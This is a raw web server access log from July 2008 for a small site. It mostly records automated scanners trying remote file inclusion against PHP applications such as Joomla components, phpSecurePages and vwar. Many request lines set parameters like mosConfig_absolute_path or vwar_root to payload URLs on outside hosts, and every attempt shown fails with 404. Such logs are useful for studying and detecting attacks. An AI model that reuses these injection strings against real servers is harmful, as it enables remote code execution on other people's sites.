59.126.46.141 - - [06/Jul/2008:18:12:37 -0700] "GET /senetman/html/index.php?page=http://monmild.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.neighborhoodglimpses.com"
59.126.46.141 - - [06/Jul/2008:18:12:38 -0700] "GET /logs/senetman/html/index.php?page=http://monmild.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.neighborhoodglimpses.com"
59.126.46.141 - - [06/Jul/2008:18:13:55 -0700] "GET /logs/senetman/html/index.php?page=http://monmild.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "neighborhoodglimpses.com"
59.126.46.141 - - [06/Jul/2008:18:13:57 -0700] "GET /senetman/html/index.php?page=http://monmild.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "neighborhoodglimpses.com"
194.151.161.240 - - [06/Jul/2008:18:14:08 -0700] "GET /index.php?sit=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
74.63.2.169 - - [06/Jul/2008:18:16:05 -0700] "GET /logs/admin/index.php?o=http://www.fo-saverne.com/images/temp/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
74.63.2.169 - - [06/Jul/2008:18:16:05 -0700] "GET /logs/access.log/admin/index.php?o=http://www.fo-saverne.com/images/temp/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
74.63.2.169 - - [06/Jul/2008:18:16:10 -0700] "GET /admin/index.php?o=http://www.fo-saverne.com/images/temp/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
82.98.78.150 - - [06/Jul/2008:18:18:01 -0700] "GET /logs/access.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
82.98.78.150 - - [06/Jul/2008:18:18:02 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
201.6.118.215 - - [06/Jul/2008:18:18:44 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.larisco.com/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
201.6.118.215 - - [06/Jul/2008:18:18:44 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.larisco.com/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
201.6.118.215 - - [06/Jul/2008:18:18:44 -0700] "GET /logs/access_080211.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.larisco.com/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
194.58.78.39 - - [06/Jul/2008:18:19:18 -0700] "GET //phpSecurePages/secure.php?&cfgProgDir=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
66.76.60.39 - - [06/Jul/2008:18:19:52 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
66.76.60.39 - - [06/Jul/2008:18:19:52 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
116.40.122.120 - - [06/Jul/2008:18:20:27 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.thelostknightsguild.com/tmp/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
116.40.122.120 - - [06/Jul/2008:18:20:32 -0700] "GET /logs/access.log//phpSecurePages/secure.php?&cfgProgDir=http://www.thelostknightsguild.com/tmp/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
116.40.122.120 - - [06/Jul/2008:18:20:34 -0700] "GET //phpSecurePages/secure.php?&cfgProgDir=http://www.thelostknightsguild.com/tmp/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
116.40.122.120 - - [06/Jul/2008:18:20:40 -0700] "GET /logs//phpSecurePages/secure.php?&cfgProgDir=http://www.thelostknightsguild.com/tmp/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
193.178.228.12 - - [06/Jul/2008:18:21:36 -0700] "GET /logs/access.log/errors.php?error=http://www.neilhosker.net//myrid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
193.178.228.12 - - [06/Jul/2008:18:21:37 -0700] "GET /errors.php?error=http://www.neilhosker.net//myrid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
193.178.228.12 - - [06/Jul/2008:18:21:37 -0700] "GET /logs/errors.php?error=http://www.neilhosker.net//myrid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
201.6.118.215 - - [06/Jul/2008:18:22:12 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.larisco.com/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
201.6.118.215 - - [06/Jul/2008:18:22:12 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.larisco.com/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
201.6.118.215 - - [06/Jul/2008:18:22:12 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.larisco.com/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
194.244.187.12 - - [06/Jul/2008:18:22:22 -0700] "GET /logs/access_080211.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
194.244.187.12 - - [06/Jul/2008:18:22:22 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
194.244.187.12 - - [06/Jul/2008:18:22:22 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
194.244.187.12 - - [06/Jul/2008:18:23:32 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
194.244.187.12 - - [06/Jul/2008:18:23:32 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
194.244.187.12 - - [06/Jul/2008:18:23:33 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
116.40.122.120 - - [06/Jul/2008:18:23:57 -0700] "GET /logs/access_080211.log/admincp/auth/checklogin.php?cfgProgDir=http://www.thelostknightsguild.com/tmp/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
116.40.122.120 - - [06/Jul/2008:18:23:57 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.thelostknightsguild.com/tmp/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
116.40.122.120 - - [06/Jul/2008:18:23:57 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.thelostknightsguild.com/tmp/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
203.22.204.188 - - [06/Jul/2008:18:25:03 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
203.22.204.188 - - [06/Jul/2008:18:25:03 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
203.22.204.188 - - [06/Jul/2008:18:25:05 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
75.127.70.16 - - [06/Jul/2008:18:25:40 -0700] "GET /logs/access_080414.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.injoyusa.com/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
82.98.78.150 - - [06/Jul/2008:18:27:22 -0700] "GET /logs/access_080414.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
91.198.175.18 - - [06/Jul/2008:18:28:00 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.oryapiinsaat.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
193.178.228.12 - - [06/Jul/2008:18:30:54 -0700] "GET /logs/access.log/errors.php?error=http://www.neilhosker.net//myrid.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
193.178.228.12 - - [06/Jul/2008:18:30:55 -0700] "GET /errors.php?error=http://www.neilhosker.net//myrid.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
193.178.228.12 - - [06/Jul/2008:18:30:55 -0700] "GET /logs/errors.php?error=http://www.neilhosker.net//myrid.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
64.38.22.250 - - [06/Jul/2008:18:31:30 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cabildoonline.com/html/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
64.38.22.250 - - [06/Jul/2008:18:31:30 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cabildoonline.com/html/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
64.38.22.250 - - [06/Jul/2008:18:31:30 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cabildoonline.com/html/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
194.58.78.39 - - [06/Jul/2008:18:33:33 -0700] "GET //phpSecurePages/secure.php?&cfgProgDir=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
88.255.236.6 - - [06/Jul/2008:18:36:51 -0700] "GET //phpSecurePages/secure.php?&cfgProgDir=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
88.255.236.6 - - [06/Jul/2008:18:36:55 -0700] "GET //phpSecurePages/secure.php?&cfgProgDir=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
116.125.113.115 - - [06/Jul/2008:18:37:15 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.luck.ro/poll/r0x.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "neighborhoodglimpses.com"
116.125.113.115 - - [06/Jul/2008:18:37:16 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.luck.ro/poll/r0x.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "neighborhoodglimpses.com"
216.14.127.59 - - [06/Jul/2008:18:40:15 -0700] "GET /logs/access_071105.log//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
216.14.127.59 - - [06/Jul/2008:18:40:15 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
216.14.127.59 - - [06/Jul/2008:18:40:16 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
69.93.225.34 - - [06/Jul/2008:18:41:04 -0700] "GET /logs/access_071105.log//modules/vwar/admin/admin.php?vwar_root=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
69.93.225.34 - - [06/Jul/2008:18:41:04 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
69.93.225.34 - - [06/Jul/2008:18:41:04 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
65.98.8.4 - - [06/Jul/2008:18:41:27 -0700] "GET /logs/access_071105.log//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
65.98.8.4 - - [06/Jul/2008:18:41:27 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
65.98.8.4 - - [06/Jul/2008:18:41:27 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
195.168.33.226 - - [06/Jul/2008:18:41:37 -0700] "GET /logs/access_071105.log//modules/vwar/admin/admin.php?vwar_root=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
195.168.33.226 - - [06/Jul/2008:18:41:37 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
195.168.33.226 - - [06/Jul/2008:18:41:38 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
80.86.123.123 - - [06/Jul/2008:18:43:01 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.neighborhoodglimpses.com"
80.86.123.123 - - [06/Jul/2008:18:43:01 -0700] "GET /logs/access.log/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.neighborhoodglimpses.com"
80.86.123.123 - - [06/Jul/2008:18:43:02 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.neighborhoodglimpses.com"
80.86.123.123 - - [06/Jul/2008:18:43:02 -0700] "GET /errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.neighborhoodglimpses.com"
80.86.123.123 - - [06/Jul/2008:18:43:03 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.neighborhoodglimpses.com"
80.86.123.123 - - [06/Jul/2008:18:43:03 -0700] "GET /logs/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.neighborhoodglimpses.com"
69.94.56.40 - - [06/Jul/2008:18:43:40 -0700] "GET /logs/access_071105.log//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.neighborhoodglimpses.com"
69.94.56.40 - - [06/Jul/2008:18:43:40 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.neighborhoodglimpses.com"
69.94.56.40 - - [06/Jul/2008:18:43:41 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.neighborhoodglimpses.com"
200.76.111.11 - - [06/Jul/2008:18:43:56 -0700] "GET /logs/access_071105.log//modules/vwar/admin/admin.php?vwar_root=http://www.iglesialcs.cl/newweb/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
200.76.111.11 - - [06/Jul/2008:18:43:56 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.iglesialcs.cl/newweb/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
200.76.111.11 - - [06/Jul/2008:18:43:57 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.iglesialcs.cl/newweb/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
66.249.70.233 - - [06/Jul/2008:18:47:44 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.neighborhoodglimpses.com"
66.249.70.233 - - [06/Jul/2008:18:47:44 -0700] "GET /logs/access_070827.log HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.neighborhoodglimpses.com"
77.232.68.17 - - [06/Jul/2008:18:48:20 -0700] "GET /logs/access_071105.log/convert/mvcw.php?step=1&vwar_root=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.neighborhoodglimpses.com"
77.232.68.17 - - [06/Jul/2008:18:48:20 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.neighborhoodglimpses.com"
77.232.68.17 - - [06/Jul/2008:18:48:30 -0700] "GET /logs/access_080211.log/convert/mvcw.php?step=1&vwar_root=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "neighborhoodglimpses.com"
77.232.68.17 - - [06/Jul/2008:18:48:31 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "neighborhoodglimpses.com"
77.232.68.17 - - [06/Jul/2008:18:48:59 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
77.232.68.17 - - [06/Jul/2008:18:49:18 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
77.232.68.17 - - [06/Jul/2008:18:49:41 -0700] "GET /logs/access_071105.log/convert/mvcw.php?step=1&vwar_root=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
194.151.161.240 - - [06/Jul/2008:18:49:41 -0700] "GET /logs/access_080211.log/index.php?sit=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
77.232.68.17 - - [06/Jul/2008:18:49:42 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
194.151.161.240 - - [06/Jul/2008:18:49:42 -0700] "GET /logs/index.php?sit=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
77.232.68.17 - - [06/Jul/2008:18:49:42 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
77.232.68.17 - - [06/Jul/2008:18:49:50 -0700] "GET /logs/access_080211.log/convert/mvcw.php?step=1&vwar_root=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
77.232.68.17 - - [06/Jul/2008:18:49:50 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
77.232.68.17 - - [06/Jul/2008:18:49:51 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
200.203.245.7 - - [06/Jul/2008:18:53:29 -0700] "GET /logs/access_071105.log//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
200.203.245.7 - - [06/Jul/2008:18:53:29 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
200.203.245.7 - - [06/Jul/2008:18:53:30 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
202.181.105.117 - - [06/Jul/2008:18:54:02 -0700] "GET /logs/access_080211.log/index.php3?act=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
202.181.105.117 - - [06/Jul/2008:18:54:02 -0700] "GET /index.php3?act=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
202.181.105.117 - - [06/Jul/2008:18:54:02 -0700] "GET /logs/index.php3?act=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
202.28.66.23 - - [06/Jul/2008:18:57:07 -0700] "GET //phpSecurePages/secure.php?&cfgProgDir=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
202.28.66.23 - - [06/Jul/2008:18:57:07 -0700] "GET //phpSecurePages/secure.php?&cfgProgDir=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
216.14.127.59 - - [06/Jul/2008:18:58:17 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
77.249.65.213 - - [06/Jul/2008:18:58:26 -0700] "GET /logs/access_071105.log//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
77.249.65.213 - - [06/Jul/2008:18:58:27 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
77.249.65.213 - - [06/Jul/2008:18:58:28 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
77.232.68.17 - - [06/Jul/2008:18:58:44 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
77.232.68.17 - - [06/Jul/2008:18:58:45 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
77.232.68.17 - - [06/Jul/2008:18:58:45 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
202.181.105.117 - - [06/Jul/2008:18:58:47 -0700] "GET /logs/access_080211.log/order.php?p=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
202.181.105.117 - - [06/Jul/2008:18:58:47 -0700] "GET /logs/order.php?p=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
202.181.105.117 - - [06/Jul/2008:18:58:47 -0700] "GET /order.php?p=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
195.168.33.226 - - [06/Jul/2008:18:58:48 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
69.93.225.34 - - [06/Jul/2008:18:59:04 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
